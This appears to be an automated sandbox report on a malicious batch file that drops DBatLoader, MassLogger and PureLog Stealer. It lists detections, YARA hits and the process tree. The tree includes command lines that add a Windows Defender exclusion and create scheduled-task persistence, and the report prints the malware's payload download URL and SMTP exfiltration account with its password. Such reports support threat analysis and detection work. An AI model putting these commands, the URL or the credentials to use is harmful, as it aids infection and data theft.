Edit tour

Windows Analysis Report
PO#5_Tower_049.bat

Overview

General Information

Sample name:	PO#5_Tower_049.bat
Analysis ID:	1583899
MD5:	0d8e4971994af9eae92707005997ad14
SHA1:	3473ecb4f88d6ceb8ab7e085bbd7f7a2bc199aea
SHA256:	6c76b0654fd88351436c641c0c81abb399a8f37702e9f8375d71283a75274f6b
Tags:	batuser-abuse_ch
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates many large memory junks

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to capture screen (.Net source)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Drops large PE files

Found large BAT file

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 4816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 4404 cmdline: extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)

x.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: EE363121466EE051042410AFFFEA28EF)

cmd.exe (PID: 5908 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rpkhzpuO.pif (PID: 6480 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Trading_AIBot.exe (PID: 2920 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)

powershell.exe (PID: 1600 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3692 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5144 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

apihost.exe (PID: 1400 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 1EC1BD626F8EA04635D66113E34C4733)

Microsofts.exe (PID: 6004 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)

Oupzhkpr.PIF (PID: 4824 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: EE363121466EE051042410AFFFEA28EF)

cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rpkhzpuO.pif (PID: 432 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Oupzhkpr.PIF (PID: 6252 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: EE363121466EE051042410AFFFEA28EF)

cmd.exe (PID: 2232 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rpkhzpuO.pif (PID: 4464 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\Microsofts.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.3277651726.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xffcd:$a1: get_encryptedPassword 0x10309:$a2: get_encryptedUsername 0xfd5a:$a3: get_timePasswordChanged 0xfe7b:$a4: get_passwordField 0xffe3:$a5: set_encryptedPassword 0x119b3:$a7: get_logins 0x11664:$a8: GetOutlookPasswords 0x11442:$a9: StartKeylogger 0x11903:$a10: KeyLoggerEventArgs 0x1149f:$a11: KeyLoggerEventArgsEventHandler
00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000012.00000001.2160139244.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.2105851599.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2145721948.0000000028640000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000012.00000002.2270156460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000017.00000001.2249245726.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2918d:$a1: get_encryptedPassword 0x413bd:$a1: get_encryptedPassword 0x595dd:$a1: get_encryptedPassword 0x294c9:$a2: get_encryptedUsername 0x416f9:$a2: get_encryptedUsername 0x59919:$a2: get_encryptedUsername 0x28f1a:$a3: get_timePasswordChanged 0x4114a:$a3: get_timePasswordChanged 0x5936a:$a3: get_timePasswordChanged 0x2903b:$a4: get_passwordField 0x4126b:$a4: get_passwordField 0x5948b:$a4: get_passwordField 0x291a3:$a5: set_encryptedPassword 0x413d3:$a5: set_encryptedPassword 0x595f3:$a5: set_encryptedPassword 0x2ab73:$a7: get_logins 0x42da3:$a7: get_logins 0x5afc3:$a7: get_logins 0x2a824:$a8: GetOutlookPasswords 0x42a54:$a8: GetOutlookPasswords 0x5ac74:$a8: GetOutlookPasswords
00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000012.00000002.2351518623.000000001FFD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000017.00000002.2391691150.0000000030C70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000017.00000002.2359070635.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000001.2063317653.0000000001220000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000004.00000002.2066610296.00000000022A6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: x.exe PID: 2788	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 6480	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 6480	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 6480	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 6480	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 6480	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23211b:$a1: get_encryptedPassword 0x232448:$a2: get_encryptedUsername 0x231ebc:$a3: get_timePasswordChanged 0x231fdd:$a4: get_passwordField 0x232131:$a5: set_encryptedPassword 0x233aa3:$a7: get_logins 0x233754:$a8: GetOutlookPasswords 0x233532:$a9: StartKeylogger 0x2339f3:$a10: KeyLoggerEventArgs 0x23358f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Microsofts.exe PID: 6004	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Microsofts.exe PID: 6004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Microsofts.exe PID: 6004	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Microsofts.exe PID: 6004	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe25c:$a1: get_encryptedPassword 0xe589:$a2: get_encryptedUsername 0xdffd:$a3: get_timePasswordChanged 0xe11e:$a4: get_passwordField 0xe272:$a5: set_encryptedPassword 0xfbe4:$a7: get_logins 0xf895:$a8: GetOutlookPasswords 0xf673:$a9: StartKeylogger 0xfb34:$a10: KeyLoggerEventArgs 0xf6d0:$a11: KeyLoggerEventArgsEventHandler
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.2.rpkhzpuO.pif.30640000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.30640f08.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.rpkhzpuO.pif.257b4e5e.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1ebd3d90.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.2de54e5e.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.1.rpkhzpuO.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
18.2.rpkhzpuO.pif.1ebd3d90.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.2de53f56.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1eb95570.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.1.rpkhzpuO.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
23.2.rpkhzpuO.pif.2f0a3d90.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1d813f56.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.2f065570.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1eb96478.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26a86478.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.1.rpkhzpuO.pif.1350008.3.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
18.2.rpkhzpuO.pif.1ffd0000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.2de53f56.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
